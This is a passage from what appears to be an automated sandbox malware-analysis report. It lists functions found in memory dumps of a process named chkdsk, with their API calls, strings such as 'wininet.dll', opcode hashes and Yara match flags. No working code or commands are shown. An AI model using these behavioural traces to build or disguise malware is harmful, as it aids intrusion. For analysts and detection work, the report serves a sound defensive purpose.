                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 79413f845d5473f7d37684bbb51857741f0e181b8b2d23aee425537a57ac1045
                                                                        • Instruction ID: 5660aa94fbdc046845d0879779636d146fbf2ff4a086c064faffe83aae22e9ff
                                                                        • Opcode Fuzzy Hash: 79413f845d5473f7d37684bbb51857741f0e181b8b2d23aee425537a57ac1045
                                                                        • Instruction Fuzzy Hash: 3B90027124100842D10461594444B560065A7E0381F91C01AA4155654D8A55C8517561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3ed64a27d9133b4faba04c4b776d1b6b7735212e489c9a9219ddb39a1ab9268c
                                                                        • Instruction ID: bf3763981931a0efecc1e05f655ace1b043f6dc9e009ef0ee8cb7b4b2d42a244
                                                                        • Opcode Fuzzy Hash: 3ed64a27d9133b4faba04c4b776d1b6b7735212e489c9a9219ddb39a1ab9268c
                                                                        • Instruction Fuzzy Hash: 0490027124108802D1146159844475A0065A7D0381F95C415A8455658D8AD588917161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2c9b0c7f66e02f09fb416ad87a6b8bf018e09b4d22da3dd52bb7367ccdf012bc
                                                                        • Instruction ID: 2d8d5a0b653e4a7f32b6a550b80dd64003d026e702cdf68b80a74b66963c5fb0
                                                                        • Opcode Fuzzy Hash: 2c9b0c7f66e02f09fb416ad87a6b8bf018e09b4d22da3dd52bb7367ccdf012bc
                                                                        • Instruction Fuzzy Hash: A89002B124100402D144715944447560065A7D0381F91C015A9095554E8A998DD576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: faba6a78e77a092b2bb8eea3b939ae92c4a92fedd10c0fa837e7cbdd952f8827
                                                                        • Instruction ID: d6709613ffd86b23a05a6a8c7b938cf218c2fcb36f69424225499297b55a8513
                                                                        • Opcode Fuzzy Hash: faba6a78e77a092b2bb8eea3b939ae92c4a92fedd10c0fa837e7cbdd952f8827
                                                                        • Instruction Fuzzy Hash: 349002A138100442D10461594454B160065E7E1381F91C019E5095554D8A59CC527166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 80f4f423ee37269f558800f12cb3ada61a76fc7cfaa1a987c79cede724a65bb4
                                                                        • Instruction ID: 54537cc91096400a295a14cae73fb5fe15ceca9dfdb7f56e816377fb70593812
                                                                        • Opcode Fuzzy Hash: 80f4f423ee37269f558800f12cb3ada61a76fc7cfaa1a987c79cede724a65bb4
                                                                        • Instruction Fuzzy Hash: 19900261282041525549B15944445174066B7E02C17D1C016A5445950C89669856E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3650bfc97048ed8163444c34ff8de7b54e8afbc2ea16ea36cb6bb0bd962c9def
                                                                        • Instruction ID: 2a7759997d49d1b39d375e62bcda358bb7cd1e85f3240c9caab1b96df713653c
                                                                        • Opcode Fuzzy Hash: 3650bfc97048ed8163444c34ff8de7b54e8afbc2ea16ea36cb6bb0bd962c9def
                                                                        • Instruction Fuzzy Hash: 2890027124100413D115615945447170069A7D02C1FD1C416A4455558D9A968952B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 19327c93c8eafb447be6661e17469671bb2ab9310e301cb7c64bddd65cbe1d2e
                                                                        • Instruction ID: fd1c85e64cf19359d484e557fa638255b4651a5a7a374983266c1c9c620d1617
                                                                        • Opcode Fuzzy Hash: 19327c93c8eafb447be6661e17469671bb2ab9310e301cb7c64bddd65cbe1d2e
                                                                        • Instruction Fuzzy Hash: C590026125180042D20465694C54B170065A7D0383F91C119A4185554CCD5588616561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B28D70 Relevance: .3, Instructions: 288COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: cdafb11a96c1e27a6cca3c030639cd4afa2727a757f13c5e96d1df2f13fc9578
                                                                        • Instruction ID: f140664f9183c579a725e7548992e0577a00cd680fabb73f96672621feba6745
                                                                        • Opcode Fuzzy Hash: cdafb11a96c1e27a6cca3c030639cd4afa2727a757f13c5e96d1df2f13fc9578
                                                                        • Instruction Fuzzy Hash: 0DA1A2B1D01219ABDB14EFA4DC42FEFB7F8EF48304F14459DE51DA6241EB30AA448BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B28D6F Relevance: .2, Instructions: 221COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: b033a87157d7162ef177d49c1c62c4195a2a418a60ca72b789a8526694848ddd
                                                                        • Instruction ID: 322a5f1be5bbef1b8235872528caff08b5d91561335ef680a4c18399ae3c4a94
                                                                        • Opcode Fuzzy Hash: b033a87157d7162ef177d49c1c62c4195a2a418a60ca72b789a8526694848ddd
                                                                        • Instruction Fuzzy Hash: DA71C5B1D00219AADB20EBA4DC41FEFB7F8EF98304F14459DF51C62142EB34AA45CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3528C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00B352A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: )U$@J7<
                                                                        • API String ID: 2538663250-745351555
                                                                        • Opcode ID: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                        • Instruction ID: d71186e14ee9e80fa1c39b3c46f709698200927fc3140bde856ecf00deaab28c
                                                                        • Opcode Fuzzy Hash: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                        • Instruction Fuzzy Hash: A93132B5A0060A9FDB10DFD8D8809EFB7B9FF88304F108599E516EB254D775EE058BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3B580 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00B3B63B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: 5a00b454eba715a5858189cfc661ee59d09ad5c975bfb9c5bb2ae71b86108ff4
                                                                        • Instruction ID: 43fe45b4f1a97815b66d0864f5a023ffb79ff228ec274d48584467a8dd4e68dc
                                                                        • Opcode Fuzzy Hash: 5a00b454eba715a5858189cfc661ee59d09ad5c975bfb9c5bb2ae71b86108ff4
                                                                        • Instruction Fuzzy Hash: 4731DEB5600704ABD714DFA4D881FABF7F8EB48300F24855EEA5D4B28AD770B944CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3B574 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00B3B63B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: bfefebea4239e9aefc67aaa82861b208778e02c46d5d96fd9e493789397d00d7
                                                                        • Instruction ID: 0eacf00d7510bf49f9bee0ca1c19f53f2cdfbf0e87272e68bc2967798ca99074
                                                                        • Opcode Fuzzy Hash: bfefebea4239e9aefc67aaa82861b208778e02c46d5d96fd9e493789397d00d7
                                                                        • Instruction Fuzzy Hash: 3931D4B1A00704ABD714DFA4D885FABF7F8FB48700F24815AE65C5B286D771A544CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B2FCE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B2FE03
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID: @
                                                                        • API String ID: 3188754299-2766056989
                                                                        • Opcode ID: 39da5d2df3aa7aea6349545b43e29f20ed0052c6d0ccbca8bc3d045be89a1cf2
                                                                        • Instruction ID: b8bb49f3783ede745c6a18fc68c3d313d77810bbc2a98fba39022226222498df
                                                                        • Opcode Fuzzy Hash: 39da5d2df3aa7aea6349545b43e29f20ed0052c6d0ccbca8bc3d045be89a1cf2
                                                                        • Instruction Fuzzy Hash: 767163B1900218AADB15DB64CCC5FFBB3BCEF58304F1449EDB52997181EB70AA858B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B35290 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00B352A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 2538663250-2016760708
                                                                        • Opcode ID: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                        • Instruction ID: 9c2aca971c19caab6bc142666897892a6f8c68fbb416da92c4347f29e6122d19
                                                                        • Opcode Fuzzy Hash: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                        • Instruction Fuzzy Hash: 943132B5A0060A9FDB10DFD8D8809EFB7B9FF88304F108599E516EB254D775EE058BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B2B150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00B2B1C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                        • Instruction ID: b8e55108386c17fd62a49bf1b5fb98a8a6e56e40c3feafc9583735e47d5305a6
                                                                        • Opcode Fuzzy Hash: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                        • Instruction Fuzzy Hash: 6A0112B5D0020DB7DF10DAA5EC42FAEB7B89B54304F1045E5A90CA7151F671EB14C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B2E7C1 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00B34282,?,?,00B34282,00000000,?), ref: 00B2E7FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                        • Instruction ID: d3564390fe5de4c9360bc49d9e9fb1de8fda902f9ccbac743ec9097f9b7884c8
                                                                        • Opcode Fuzzy Hash: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                        • Instruction Fuzzy Hash: 64F028725092941BF7205A79AC06BE03BD4CF46734F1803D5ECAC8E1D3D566E8068280
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CC91 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00B2E122,00B2E122,?,00000000,?,?), ref: 00B3CCD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                        • Instruction ID: 60d06eae6a47e7b5885c28065bdebae7b336102a18bbe41d6841ec348925dc2f
                                                                        • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                        • Instruction Fuzzy Hash: 0EF03CB66042046FD720EF99DC85EA737ADEF85224F158499FD4C9B342D630E9108BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3B6C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,3B7578DC,00000000,00000000,00B2DDC2,?,?,?,3B7578DC,?), ref: 00B3B702
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                        • Instruction ID: 56a50fbc68ba9088aa721a533c2118aee1da71ffb1b080785e746c13042e6ee0
                                                                        • Opcode Fuzzy Hash: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                        • Instruction Fuzzy Hash: 01F0307378021436E32062ADAC02F97769CDB84B61F140455FB0CEA181D992B84146E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CB32 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 00B3CB6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                        • Instruction ID: 267ae059fe2067e6e690de70f865b0ceeb9d95a642e11cbdf07aa523f0d6f60c
                                                                        • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                        • Instruction Fuzzy Hash: 98F0A0742402046FCB18DF55DC45EEB3BAAEF893A0F204054F90997382D230ED11CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B2E7D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00B34282,?,?,00B34282,00000000,?), ref: 00B2E7FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                        • Instruction ID: 4c35e3e1d9558ed5f5bbbae741f7df44aadb322ab2561ebddd3ee6f6845e1d90
                                                                        • Opcode Fuzzy Hash: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                        • Instruction Fuzzy Hash: ADE0867565020827FB246AA9EC4AFA63398CB88724F184690FAACDF2C2D574F9418154
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CAC7 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 00B3CB6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                        • Instruction ID: a05d60c93a63eb12996a296af8512a847f2fe96377a48407fdb6086747c95b88
                                                                        • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                        • Instruction Fuzzy Hash: 79E0D8E40152C51FDB14FFA99890857BBD9DF86210720498EE89457606C121D5659B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CB00 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00B36EE3,?,00B3768D,00B3768D,?,00B36EE3,00000000,?,?,?,?,00000000,00000000,00000002), ref: 00B3CB2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                        • Instruction ID: ef4af7a365d14d413feedbc7a5fb419705168d7938f687775f97c185a85ac976
                                                                        • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                        • Instruction Fuzzy Hash: BBE046B2210208ABCB14EF89DC45EA737ACEF88764F118054FE085B342C630F910CAF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CB40 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 00B3CB6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                        • Instruction ID: 1b1e01b0da149764c0482d82dd6592b17a3e4267025df44ee2cc95b239d92f92
                                                                        • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                        • Instruction Fuzzy Hash: CCE012B1200208ABCB14EF89DC49EA737ACAF88760F118058BA095B282C630F910CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CCA0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00B2E122,00B2E122,?,00000000,?,?), ref: 00B3CCD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                        • Instruction ID: 4211ef4fc76cf66056176d2f7ad81c9721b6ea2f6e2ed1a6d86eda0df95753ef
                                                                        • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                        • Instruction Fuzzy Hash: BEE01AB16002046BC710EF49DC45EE737ADAF88654F154064BA0857242D634F8108AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B2E5D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00B28D8A,?), ref: 00B2E601
                                                                        Memory Dump Source
